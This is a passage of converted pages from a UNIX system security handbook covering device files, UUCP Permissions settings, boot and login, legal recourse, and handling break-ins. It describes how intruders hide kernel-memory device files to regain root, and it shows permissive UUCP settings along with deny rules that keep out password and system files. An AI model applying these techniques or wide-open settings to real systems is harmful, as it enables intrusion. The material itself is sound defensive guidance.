disk, the changes our programs made won't be there when the system reboots. Thus, we need to periodically flush the<br />

modified buffers out to disk. That is effectively what the sync () system call does: schedule the buffers to be flushed<br />

to disk. Most systems have a syn or fsflush daemon that issues a sync() call every 30 or 60 seconds to make sure the<br />

disk is mostly up to date. If the system goes down between sync() calls, we need to run a program such as fsck or<br />

checkfsys to make certain that no directories whose buffers were in memory were left in an inconsistent state.<br />

<strong>UNIX</strong> usually has some special device files that don't correspond to physical devices. The /dev/null device simply<br />

discards anything written to it, and nothing can ever be read from it - a process that attempts to do so gets an<br />

immediate end-of-file condition. Writing to the /dev/console device results in output being printed on the system<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_06.htm (1 of 3) [2002-04-12 10:45:12]


[Chapter 5] 5.6 Device Files<br />

console terminal. And reading or writing to the /dev/kmem device accesses the kernel's memory. Devices such as<br />

these are often referred to as pseudo-devices.<br />

Device files are one of the reasons <strong>UNIX</strong> is so flexible and popular - they allow programmers to write their programs<br />

in a general way without having to know the actual type of device being used. Unfortunately, they also can present a<br />

major security hazard when an attacker is able to access them in an unauthorized way.<br />

For instance, if attackers can read or write to the /dev/kmem device, they may be able to alter their priority, UID, or<br />

other attributes of their process. They could also scribble garbage data over important data structures and crash the<br />

system. Similarly, access to disk devices, tape devices, network devices, and terminals being used by others all can<br />

lead to problems. Access to your screen buffer might allow an attacker to read what is displayed on your screen.<br />

Access to your audio devices might allow an attacker to eavesdrop on your office without your knowing about it.<br />

In standard configurations of <strong>UNIX</strong>, all the standard device files are located in the directory /dev. There is usually a<br />

script (e.g., MAKEDEV) in that directory that can be run to create the appropriate device files and set the correct<br />

permissions. A few devices, such as /dev/null, /dev/tty, and /dev/console, should all be world-writable, but most of<br />

the rest should be unreadable and unwritable by regular users. Note that on some System V systems, many of the<br />

files in /dev are symbolic links to files in the /devices directory: those are the files whose permissions you need to<br />

check.<br />

Check the permissions on these files when you install the system, and periodically thereafter. If any permission is<br />

changed, or any device is accessible to all users, you should investigate. This research should be included as part of<br />

your checklists.<br />

Unauthorized Device Files<br />

Although device files are normally located in the /dev directory, they may, in fact, be anywhere on your system. A<br />

common method used by system crackers is to get on the system as the superuser and then create a writable device<br />

file in a hidden directory, such as the /dev/kmem device hidden in /usr/lib and named to resemble one of the libraries.<br />

Later, if they wish to become superuser again, they know the correct locations in /dev/kmem to alter with a symbolic<br />

debugger or custom program to allow them that access. For instance, by changing the code for a certain routine to<br />

always return true, they can execute su to become root without needing a password. Then, they set the routine back<br />

to normal.<br />

You should periodically scan your disks for unauthorized device files. The ncheck command, mentioned earlier, will<br />

print the names of all device files when run with the -s option. Alternatively, you can execute the following:<br />

# find / \( -type c -o -type b \) -exec ls -l {} \;<br />

If you have NFS-mounted directories, use this version of the script:<br />

# find / \( -local -o -prune \) \( -type c -o -type b \) -exec ls -l {} \;<br />

Note that some versions of NFS allow users on remote machines running as root to create device files on exported<br />

volumes. [27] This is a major problem. Be very careful about exporting writable directories using NFSDEVICE<br />

FILESFILESDEVICE (see Chapter 20, for more information).<br />

[27] Of course, these modifications cannot be made if the filesystem is exported read only.<br />

Not Everything Is a File or a Device!<br />

The two commands:<br />

find / \! -type f -a \! -type d -exec ls -l {} \;<br />

and:<br />

find / \( -type c -o -type b \) -exec ls -l {} \;<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_06.htm (2 of 3) [2002-04-12 10:45:12]


[Chapter 5] 5.6 Device Files<br />

are not equivalent!<br />

The first command prints all of the entries in the filesystem that are not files or directories. The second prints all of<br />

the entries in the filesystem that are either character or block devices.<br />

Why aren't these commands the same? Because there are other things that can be in a filesystem that are neither files<br />

nor directories. These include:<br />

●<br />

●<br />

●<br />

Symbolic Links<br />

Sockets<br />

Named pipes (FIFOS)<br />

5.5 SUID 5.7 chown: Changing a File's<br />

Owner<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_06.htm (3 of 3) [2002-04-12 10:45:12]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

Chapter 15<br />

UUCP<br />

15.5 <strong>Sec</strong>urity in BNU UUCP<br />

In BNU, the Permissions file replaces both the Version 2 USERFILE and L.cmds files. Permissions<br />

provides additional protection and finer control over the UUCP system. A second file called<br />

remote.unknown controls whether or not an unknown system (that is, one not listed in your Systems file) can<br />

log in (assuming that the remote system knows a valid UUCP login name and password).<br />

15.5.1 Permissions File<br />

The Permissions file consists of commands, possibly multi-line, and often separated by blank lines, that are<br />

used to determine what users and remote machines can and cannot do with the UUCP system.<br />

Here is a sample Permissions file. For now, don't worry about what all the commands mean: we'll explain<br />

them shortly.<br />

LOGNAME=Ugarp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic<br />

MACHINE=garp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic<br />

15.5.1.1 Starting up<br />

When uucico starts, it scans the Permissions file to determine which commands the remote machine can<br />

execute and which files can be accessed.<br />

When uucicio calls another system, it looks for a block of commands containing a MACHINE=system<br />

statement, where system is the name of the machine that it is calling. For example, if you are calling the<br />

machine idr, it looks for a line in the form:<br />

MACHINE=idr<br />

When uucico is started by another computer logging in to your local machine, uucico looks for a block of<br />

commands containing a LOGNAME=loginname, where loginname is the username with which the remote<br />

computer has logged in. For example, if the remote computer has logged in with the username Uidr, the<br />

uucico running on your computer looks for a block of commands with a line containing this statement:<br />

LOGNAME=Uidr<br />

Other commands in the command block specify what the remote machine can do:<br />

15.5.1.2 Name-value pairs<br />

In BNU terminology, the MACHINE=, LOGNAME=, READ=, and WRITE= statements are called "<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (1 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

name-value pairs." This name comes from their format:<br />

name=value<br />

To specify a block of commands for use when calling the machine bread, you would use a command in the<br />

form:<br />

MACHINE=bread<br />

You can specify multiple values by separating them with colons (:). For example:<br />

MACHINE=bread:butter:circus<br />

15.5.1.3 A Sample Permissions file<br />

Here is the sample Permissions file again:<br />

LOGNAME=Ugarp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic<br />

MACHINE=garp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic<br />

This Permissions file gives the machine garp permission to read and write files in the /usr/spool/uucppublic<br />

directory. It also allows any remote computer logging in with the UUCP login Ugarp to read and write files<br />

from those directories.<br />

Here is another example:<br />

# If garp calls us, only allow access to uucppublic<br />

#<br />

LOGNAME=Ugarp MACHINE=garp READ=/usr/spool/uucppublic \<br />

WRITE=/usr/spool/uucppublic<br />

This command allows the machine garp to read or write any file in /usr/spool/uucppublic, but only when<br />

the machine garp logs into your computer using the uucp login Ugarp. Notice in this example that the<br />

backslash (\) character is used to continue the entry on the following line. To include a comment, begin a<br />

line with a hash mark (#).<br />

You can combine a LOGNAME= and a MACHINE= entry in a single line:<br />

# Let garp have lots of access<br />

#<br />

LOGNAME=Ugarp MACHINE=garp READ=/ WRITE=/ REQUEST=yes SENDFILES=yes<br />

The REQUEST=yes name-value pair allows garp to request files from your machine. The<br />

SENDFILES=yes pair allows you to send files to garp even when it initiates the call to you.<br />

If you assign a unique login ID for each UUCP system with which you communicate, then LOGNAME=<br />

and MACHINE= can each be thought of as controlling one direction of the file transfer operation. But if the<br />

same login ID is shared by several UUCP systems, they will all be covered by the same LOGNAME= entry<br />

when they call you, even though they will each be covered by their own MACHINE= entry when you call<br />

them.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (2 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

15.5.2 Permissions Commands<br />

BNU UUCP has 13 different commands that can be included in the Permissions file. These commands help<br />

provide the flexibility that BNU allows over UUCP connections. These commands are placed in the same<br />

command block as the MACHINE= and LOGNAME= commands described above. You can specify as<br />

many commands in a block as you wish.<br />

A MACHINE= entry in the Permissions file is used when a specific remote site is contacted by the local<br />

computer. Specify a MACHINE= OTHER entry to define a Permissions entry for any machine that is not<br />

explicitly referenced.<br />

For example:<br />

# Setup for when we call garp<br />

MACHINE=garp<br />

LOGNAME= is used when a remote site logs in with a specific login name. Each UUCP login name should<br />

appear in only one LOGNAME entry.<br />

For example:<br />

# Setup login for when garp calls<br />

LOGNAME=Ugarp<br />

You can specify a LOGNAME=OTHER entry to define a Permissions entry for any machine that is not<br />

explicitly referenced.<br />

For example:<br />

# Setup login for everybody else<br />

LOGNAME=OTHER<br />

REQUEST= specifies whether the remote system can request file transfers with your computer. The default<br />

is "no," which means that files can be transferred only if the uucp command is issued on your computer.<br />

For example:<br />

# Let garp request files<br />

MACHINE=garp LOGNAME=Ugarp REQUEST=YES<br />

SENDFILES= specifies whether files that are queued on the local system should be sent to the calling<br />

system when it contacts the local system. The default is "call," which means "no, don't send any queued<br />

files when the other computer calls me; hold the files until I call the other computer." The reason for this<br />

option is that you are more sure of the identity of a remote computer when you call it than when it calls you.<br />

If you set this entry to "yes," all of the queued files will be sent whenever the remote system calls you, or<br />

when you call it, whichever happens first. This option makes sense only with the LOGNAME entries. If this<br />

option is used with a MACHINE entry, it is ignored.<br />

For example:<br />

# Send files to garp when it calls us<br />

LOGNAME=Ugarp SENDFILES=YES<br />

PUBDIR= allows you to specify directories for public access. The default is /usr/spool/uucppublic.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (3 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

For example:<br />

# Let garp use two public directories<br />

MACHINE=garp LOGNAME=Ugarp READ=/ WRITE=/ \<br />

PUBDIR=/usr/spool/uucppublic:/usr/spool/garp<br />

READ= and WRITE= specify the directories that uucico can use to read from or write to. The default is the<br />

PUBDIR.<br />

You can specify access to all of the temporary directories on your system with the following command:<br />

# Let garp read lots<br />

MACHINE=garp LOGNAME=Ugarp \<br />

READ=/usr/spool/uucppublic:/tmp:/usr/tmp \<br />

WRITE=/usr/spool/uucppublic:/tmp:/usr/tmp<br />

You can let garp access every file on your system with the command:<br />

# Let garp read even more<br />

MACHINE=garp LOGNAME=Ugarp \<br />

READ=/ WRITE=/<br />

We don't recommend this!<br />

NOREAD= and NOWRITE= specify directories that uucico may not read to or write from, even if those<br />

directories are included in a READ or a WRITE command. You might want to use the NOREAD and<br />

NOWRITE directives to exclude directories like /etc and /usr/lib/uucp, so that there is no way that people<br />

on machines connected to yours via UUCP can read files like /etc/passwd and /usr/lib/uucp/Systems.<br />

For example:<br />

MACHINE=garp LOGNAME=Ugarp \<br />

READ=/ \<br />

WRITE=/usr/spool/uucppublic:/tmp:/usr/tmp \<br />

NOREAD=/etc:/usr/lib/uucp \<br />

NOWRITE=/etc:/usr/lib/uucp<br />

CALLBACK=specifies whether or not the local system must call back the calling system before file<br />

transfer can occur. The default is "no." CALLBACK enhances security in some environments. Normally, it<br />

is possible with UUCP for one machine to masquerade as another. If you call a remote machine, however, it<br />

is unlikely that such a masquerade is taking place. CALLBACK is also useful for situations where one<br />

computer is equipped with a low-cost, long-distance telephone line, so that the majority of the call will be<br />

billed at the lower rate. The CALLBACK command makes sense only for LOGNAME entries. If two sites<br />

have CALLBACK=yes specified for each other, the machines will continually call back and forth, but no<br />

data will be transferred.<br />

For example:<br />

# We'll call garp<br />

LOGNAME=Ugarp CALLBACK=YES<br />

For further information, see our comments on callback in Chapter 14.<br />

COMMANDS= specifies commands that the remote system can execute on the local computer. When uuxqt<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (4 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

executes a command, it searches the Permissions file for the MACHINE= entry associated with the<br />

particular system from which the commands were sent. The MACHINE= entry is the one that is used, even<br />

if the uucico connection was originated by the remote machine and a different LOGNAME= entry is being<br />

used.<br />

The default value for COMMANDS is compiled into your version of uuxqt; if you have source code, it is<br />

defined in the file params.h. The COMMANDS= entry often has the single form:<br />

COMMANDS=rmail<br />

You can specify a full pathname:<br />

COMMANDS=rmail:/usr/bin/rnews:/usr/ucb/lpr<br />

You can specify the value ALL, which allows any command to be executed:<br />

COMMANDS=ALL<br />

You probably don't want to specify ALL unless you have complete control over all of the machines that you<br />

connect to with UUCP.<br />

For example:<br />

# Let garp send us mail, netnews, and print files<br />

MACHINE=garp LOGNAME=Ugarp \<br />

COMMANDS=rmail:rnews:lpr<br />

VALIDATE= is used with a LOGNAME entry to provide a small additional degree of security. Specifying<br />

a machine name (or many machine names) in the VALIDATE= entry will allow that UUCP login to be<br />

used only by those machines.<br />

For example:<br />

# Let's be sure about garp<br />

LOGNAME=Ugarp VALIDATE=garp<br />

This command prevents any UUCP computer other than garp from using the Ugarp login. Of course,<br />

anybody interested in using UUCP to break into your computer could as easily change their UUCP name to<br />

be garp, so this command really doesn't provide very much security.<br />

MYNAME= can be used to change the UUCP name of your computer when it initiates a UUCP connection.<br />

This command is useful for testing. It is also helpful when you use a generic name for your site, but it is not<br />

the same as your UUCP machine. For example:<br />

# When we call garp, present ourselves as bigcorp<br />

MACHINE=garp \<br />

MYNAME=bigcorp<br />

Got that? You can make your computer have any UUCP name that you want! Anybody else can do this as<br />

well, so be careful if you let any machine execute commands (specified in the COMMANDS= entry) that<br />

might be considered potentially unsafe (e.g., rm, shutdown).<br />

NOTE: If you wish to run a secure system, the directory /usr/lib/uucp (or /etc/uucp) must not<br />

be in the WRITE directory list (or it must be in the NOWRITE list)! If users from the outside<br />

are allowed to transfer into these directories, they can change the Permissions file to allow<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (5 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

them to execute any command that they wish. Similarly, local users can use the uucp command<br />

to change these files, and then subvert UUCP. Giving all access from the / directory is also<br />

dangerous - as such, people outside your organization can subvert your system easily.<br />

Furthermore, the home directory for the uucp user should not be in the /<br />

usr/spool/uucp/uucppublic directory, or in any other directory that can be written to by a uucp<br />

user. Doing so allows an outside user to subvert the system.<br />

15.5.3 uucheck: Checking Your Permissions File<br />

Verifying the Permissions file can be tricky. To help with this important task, BNU includes a program<br />

called uucheck that does it for you.<br />

Normally, the uucheck program only reports security problems. However, it has a -v option which causes<br />

the program to produce a full report.<br />

Below is a sample Permissions file that lets the computer garp (or anybody using the UUCP login Ugarp)<br />

access a variety of files and execute a number of commands:<br />

# cat Permissions<br />

MACHINE=garp LOGNAME=Ugarp \<br />

COMMANDS=rmail:rnews:uucp \<br />

READ=/usr/spool/uucppublic:/usr/tmp \<br />

WRITE=/usr/spool/uucppublic:/usr/tmp \<br />

SENDFILES=yes REQUEST=no<br />

Here is the output from the uucheck program run with the above Permissions file:<br />

Example 15.1: Verifying the Sample UUCP Permissions File<br />

# /usr/lib/uucp/uucheck -v<br />

*** uucheck: Check Required Files and Directories<br />

*** uucheck: Directories Check Complete<br />

*** uucheck: Check /etc/uucp/Permissions file<br />

** LOGNAME PHASE (when they call us)<br />

When a system logs in as: (Ugarp)<br />

We DO NOT allow them to request files.<br />

We WILL send files queued for them on this call.<br />

They can send files to<br />

/usr/spool/uucppublic<br />

/usr/tmp<br />

Sent files will be created in /var/spool/uucp<br />

before they are copied to the target directory.<br />

Myname for the conversation will be sun.<br />

PUBDIR for the conversation will be /usr/spool/uucppublic.<br />

** MACHINE PHASE (when we call or execute their uux requests)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (6 of 7) [2002-04-12 10:45:13]


[Chapter 15] 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

When we call system(s): (garp)<br />

We DO NOT allow them to request files.<br />

They can send files to<br />

/usr/spool/uucppublic<br />

/usr/tmp<br />

Sent files will be created in /var/spool/uucp<br />

before they are copied to the target directory.<br />

Myname for the conversation will be sun.<br />

PUBDIR for the conversation will be /usr/spool/uucppublic.<br />

Machine(s): (garp)<br />

CAN execute the following commands:<br />

command (rmail), fullname (rmail)<br />

command (rnews), fullname (rnews)<br />

command (uucp), fullname (uucp)<br />

*** uucheck: /etc/uucp/Permissions Check Complete<br />

#<br />

15.4 <strong>Sec</strong>urity in Version 2<br />

UUCP<br />

15.6 Additional <strong>Sec</strong>urity<br />

Concerns<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_05.htm (7 of 7) [2002-04-12 10:45:13]


[Appendix C] C.5 Starting Up <strong>UNIX</strong> and Logging In<br />

Appendix C<br />

<strong>UNIX</strong> Processes<br />

C.5 Starting Up <strong>UNIX</strong> and Logging In<br />

Most modern computers are equipped with a certain amount of read-only memory (ROM) that contains<br />

the first program that a computer runs when it is turned on. Typically, this ROM will perform a small<br />

number of system diagnostic tests to ensure that the system is operating properly, after which it will load<br />

another program from a disk drive or from the network. This process is called bootstrapping.<br />

Although every <strong>UNIX</strong> system bootstraps in a slightly different fashion, usually the ROM monitor loads a<br />

small program called boot that is kept at a known location on the hard disk (or on the network.) The boot<br />

program then loads the <strong>UNIX</strong> kernel into the computer and starts running it.<br />

After the kernel initializes itself and determines the machine's configuration, it creates a process with a<br />

PID of 1 which runs the /etc/init program.<br />

C.5.1 Process #1: /etc/init<br />

The program /etc/init finishes the task of starting up the computer system and lets users log in.<br />

Some <strong>UNIX</strong> systems can be booted in a single-user mode. If <strong>UNIX</strong> is booted in single-user mode, the<br />

init program forks and runs the standard <strong>UNIX</strong> shell, /bin/sh, on the system console. This shell, run as<br />

superuser, gives the person sitting at the console total access to the system. It also allows nobody else<br />

access to the system; no network daemons are started unless root chooses to start them.<br />

Some systems can be set up to require a password to boot in single-user mode, while others cannot.<br />

Many workstations - including those made by Sun Microsystems - allow you to set a special user<br />

password using the boot monitor in ROM. Single-user mode is designed to allow the resurrection of a<br />

computer with a partially corrupted filesystem; if the /etc/passwd file is deleted, the only way to rebuild it<br />

would be to bring the computer up in single-user mode. Unfortunately, single-user mode is also a<br />

security hole, because it allows unprivileged people to execute privileged commands simply by typing<br />

them on the system console; computers that can be brought up in single-user mode should have their<br />

consoles in a place that is physically secure. On many Berkeley-derived systems, changing the line in the<br />

/etc/ttytab file for the console so that it is not marked as "secure" will force the user to provide a<br />

password when booting in single-user mode.<br />

Some <strong>UNIX</strong> systems can also be booted in a maintenance mode. Maintenance mode is similar to<br />

single-user mode, except that the root password must first be typed on the system console.<br />

NOTE: Do not depend on the maintenance mode to prevent people from booting your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_05.htm (1 of 3) [2002-04-12 10:45:13]


[Appendix C] C.5 Starting Up <strong>UNIX</strong> and Logging In<br />

computers in single-user mode. Most computers can be booted from CDROMS or floppy<br />

disks, allowing anyone with even the most modest technical knowledge to gain superuser<br />

privileges if they have physical access to the system.<br />

In normal operation, /etc/init then executes the shell script /etc/rc. Depending on which version of <strong>UNIX</strong><br />

you are using, /etc/rc may execute a variety of other shell scripts whose names all begin with /etc/rc<br />

(common varieties include /etc/rc.network and /etc/rc.local) or which are located in the directory<br />

/etc/init.d or /etc/rc?.d. System V systems additionally use the file /etc/inittab to control what is done at<br />

various run levels. The /etc/rc script(s) set up the <strong>UNIX</strong> as a multi-user system, performing a variety of<br />

features, including:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Removing temporary files from the /tmp and/or /usr/tmp directories<br />

Removing any lock files<br />

Checking filesystem consistency and mounting additional filesystems<br />

Turning on accounting and quota checking<br />

Setting up the network<br />

When /etc/rc finishes executing, &sol;etc/init forks a new process for every enabled terminal on the<br />

system. On older systems, this program is called /etc/getty. On newer systems, including SVR4, it is<br />

called /usr/lib/saf/ttymon.<br />

C.5.2 Logging In<br />

The getty or ttymon program is responsible for configuring the user terminal and displaying the initial<br />

prompt. A copy of the program is run for each port that is monitored. Whenever the process dies, init<br />

starts another one to take its place. If the init process dies, <strong>UNIX</strong> halts or reboots (depending on the<br />

version of <strong>UNIX</strong> installed).<br />

The getty or ttymon program displays the word login: (or a similar prompt) on its assigned terminal and<br />

waits for a username to be typed. When it gets a username, getty/ttymon exec's the program /bin/login,<br />

which asks for a password and validates it against the password stored in /etc/passwd. If the password<br />

does not match, the login program asks for a new username and password combination.<br />

Some versions of <strong>UNIX</strong> can be set up to require an additional password if you're trying to log into the<br />

computer over a modem. See the reference page for your login program for details.<br />

If you do not log in within a short period of time (usually 60 seconds), or if you make too many incorrect<br />

attempts, login exits and init starts up a new getty/ttymon program on the terminal. On some systems<br />

equipped with modems, this causes the telephone to hang up. Again, this strategy is designed to deter an<br />

unauthorized user from breaking into a <strong>UNIX</strong> computer by making the task more difficult: after trying a<br />

few passwords, a cracker attempting to break into a <strong>UNIX</strong> machine is forced to redial the telephone.<br />

If the username and password match, the login program performs some accounting and initialization<br />

tasks, then changes its real and effective UIDS to be those of the username that has been supplied. login<br />

then exec's your shell program, usually /bin/csh or /bin/ksh. The process number of that shell is the same<br />

as the original getty. /etc/init receives a SIGCHLD signal when this process dies; /etc/init then starts a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_05.htm (2 of 3) [2002-04-12 10:45:13]


[Appendix C] C.5 Starting Up <strong>UNIX</strong> and Logging In<br />

new getty or ttymon.<br />

On Berkeley-derived systems, the file /etc/ttys or /etc/ttytab contains a line for each terminal that is to<br />

have a getty/ttymon process enabled. It also contains information on terminal type, if known, and an<br />

indication if the line is "secure." The root user cannot log into a terminal that is not secure; to become the<br />

superuser on one of these lines, you must first log in as yourself, then use the su command. Unless your<br />

terminal lines are all in protected areas, turning off "secure" on all lines is a good precaution.<br />

C.5.3 Running the User's Shell<br />

After you log in, <strong>UNIX</strong> will start up your shell. The shell will then read a series of start-up commands<br />

from a variety of different files, depending on which shell you are using and which flavor of <strong>UNIX</strong> you<br />

are running.<br />

If your shell is /bin/sh (the Bourne shell) or /bin/ksh (the Korn shell), <strong>UNIX</strong> will execute all of the<br />

commands stored in a special file called .profile in your home directory. (On some systems, /bin/sh and<br />

/bin/ksh will also execute the commands stored in the /etc/profile or /usr/lib/profile file.)<br />

If your shell is /bin/csh (the C shell), <strong>UNIX</strong> will execute all of the commands stored in the .cshrc file in<br />

your home directory. The C shell will then execute all of the commands stored in the .login file in your<br />

home directory. When you log out, the commands in the file .logout will be executed.<br />

Because these files are automatically run for you when you log in, they can present a security problem: if<br />

an intruder were to modify the files, the end result would be the same as if the intruder were typing<br />

commands at your keyboard every time you logged in! Thus, these files should be protected so that an<br />

intruder cannot write to the files or replace them with other files. Chapter 5, The <strong>UNIX</strong> Filesystem,<br />

explains how to protect your files.<br />

C.4 The kill Command D. Paper Sources<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_05.htm (3 of 3) [2002-04-12 10:45:13]


[Chapter 26] Computer <strong>Sec</strong>urity and U.S. Law<br />

Chapter 26<br />

26. Computer <strong>Sec</strong>urity and U.S. Law<br />

Contents:<br />

Legal Options After a Break-in<br />

Criminal Prosecution<br />

Civil Actions<br />

Other Liability<br />

You may have studied this book diligently and taken every reasonable step toward protecting your<br />

system, yet someone still abused it. Perhaps an ex-employee has broken in through an old account and<br />

has deleted some records. Perhaps someone from outside continues to try to break into your system<br />

despite warnings that they should stop. What recourse do you have through the courts? Furthermore,<br />

what are some of the particular dangers you may face from the legal system during the normal operation<br />

of your computer system? What happens if you are the target of legal action?<br />

This chapter attempts to illuminate some of these issues. The material we present should be viewed as<br />

general advice, and not as legal opinion: for that, you should contact good legal counsel and have them<br />

advise you.<br />

26.1 Legal Options After a Break-in<br />

You have a variety of different recourses under the U.S. legal system for dealing with a break-in. A brief<br />

chapter such as this one cannot advise you on the subtle aspects of the law. Every situation is different.<br />

Furthermore, there are differences between state and Federal law, as well as different laws that apply to<br />

computer systems used for different purposes. Laws outside the U.S. vary considerably from jurisdiction<br />

to jurisdiction; we won't attempt to explain anything beyond the U.S. system.[1]<br />

[1] An excellent discussion of legal issues in the U.S. can be found in Computer Crime: A<br />

Crimefighter's Handbook (<strong>O'Reilly</strong> & Associates. 1995), and we suggest you start there if<br />

you need more explanation than we provide in this chapter.<br />

You should discuss your specific situation with a competent lawyer before pursuing any legal recourse.<br />

As there are difficulties and dangers associated with legal approaches, you should also be sure that you<br />

want to pursue this course of action before you go ahead.<br />

In some cases, you may have no choice; you may be required to pursue legal means. For example:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_01.htm (1 of 2) [2002-04-12 10:45:13]


[Chapter 26] Computer <strong>Sec</strong>urity and U.S. Law<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If you want to file a claim against your insurance policy to receive money for damages resulting<br />

from a break-in, you may be required by your insurance company to pursue criminal or civil<br />

actions against the perpetrators.<br />

If you are involved with classified data processing, you may be required by government<br />

regulations to report and investigate suspicious activity.<br />

If you are aware of criminal activity and you do not report it (and especially if your computer is<br />

being used for that activity), you may be criminally liable as an accessory.<br />

If your computer is being used for certain forms of unlawful or inappropriate activity and you do<br />

not take definitive action, you may be named as a defendant in a civil lawsuit seeking punitive<br />

damages for that activity.<br />

If you are an executive and decide not to investigate and prosecute illegal activity, shareholders in<br />

your corporation can bring suit against you.<br />

If you believe that your system is at risk, you should probably seek legal advice before a break-in<br />

actually occurs. By doing so, you will know ahead of time the course of action to take if an incident<br />

occurs.<br />

To give you some starting points for discussion, this chapter provides an overview of the two primary<br />

legal approaches you can employ, and some of the features and difficulties that accompany each one.<br />

25.3 Network Denial of<br />

Service Attacks<br />

26.2 Criminal Prosecution<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_01.htm (2 of 2) [2002-04-12 10:45:13]


[Chapter 24] Discovering a Break-in<br />

Chapter 24<br />

24. Discovering a Break-in<br />

Contents:<br />

Prelude<br />

Discovering an Intruder<br />

The Log Files: Discovering an Intruder's Tracks<br />

Cleaning Up After the Intruder<br />

An Example<br />

Resuming Operation<br />

Damage Control<br />

This chapter describes what to do if you discover that someone has broken into your computer system:<br />

how to catch the intruder; how to figure out what, if any, damage has been done; and how to repair the<br />

damage, if necessary. We hope that you'll never have to use the techniques mentioned here.<br />

24.1 Prelude<br />

There are three major rules for handling security breaches.<br />

24.1.1 Rule #1: DON'T PANIC<br />

After a security breach, you are faced with many different choices. No matter what has happened, you<br />

will only make things worse if you act without thinking.<br />

Before acting, you need to answer certain questions and keep the answers firmly in mind:<br />

●<br />

●<br />

●<br />

●<br />

Did you really have a breach of security? Something that appears to be the action of an intruder<br />

might actually be the result of human error or software failure.<br />

Was any damage really done? With many security breaches, the perpetrator gains unauthorized<br />

access but doesn't actually access privileged information or maliciously change the contents of<br />

files.<br />

Is it important to obtain and protect evidence that might be used in an investigation?<br />

Is it important to get the system back into normal operation as soon as possible?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_01.htm (1 of 3) [2002-04-12 10:45:14]


[Chapter 24] Discovering a Break-in<br />

●<br />

●<br />

●<br />

Are you willing to take the chance that files have been altered or removed? If not, how can you tell<br />

for sure if changes have been made?<br />

Does it matter if anyone within the organization hears about this incident? If somebody outside<br />

hears about it?<br />

Can it happen again?<br />

The answers to many of these questions may be contradictory; for example, protecting evidence and<br />

comparing files may not be possible if the goal is to get the system back into normal operation as soon as<br />

possible. You'll have to decide what's best for your own site.<br />

24.1.2 Rule #2: DOCUMENT<br />

Start a log, immediately. Take a notebook and write down everything you find, always noting the date<br />

and time. If you examine text files, print copies and then sign and date the hardcopy. If you have the<br />

necessary disk space, record your entire session with the script command, too. Having this information<br />

on hand to study later may save you considerable time and aggravation, especially if you need to restore<br />

or change files quickly to bring the system back to normal.<br />

This chapter and the two chapters that follow present a set of guidelines for handling security breaches.<br />

In the following sections, we describe the mechanisms you can use to help you detect a break-in, and<br />

handle the question of what to do if you discover an intruder on your system. In Chapter 25, Denial of<br />

Service Attacks and Solutions, we'll describe denial of service attacks - ways in which attackers can<br />

make your system unusable without actually destroying any information. Finally, in Chapter 26,<br />

Computer <strong>Sec</strong>urity and U.S. Law, we'll discuss legal approaches and considerations you may need to<br />

consider after a security incident.<br />

24.1.3 Rule #3: PLAN AHEAD<br />

A key to effective response in an emergency is advance planning. When a security problem occurs, there<br />

are some standard steps to be taken. You should have these steps planned out in advance so there is little<br />

confusion or hesitation when an incident occurs.<br />

In larger installations, you may want to practice your plans. For example, along with standard fire drills,<br />

you may want to have "virus drills" to practice coping with the threat of a virus, or "break-in drills." The<br />

following basic steps should be at the heart of your plan:<br />

Step 1: Identify and understand the problem.<br />

If you don't know what the problem is, you cannot take action against it. This rule does not mean<br />

that you need to have perfect understanding, but you should understand at least what form of<br />

problem you are dealing with. Cutting your computer's network connection won't help you if the<br />

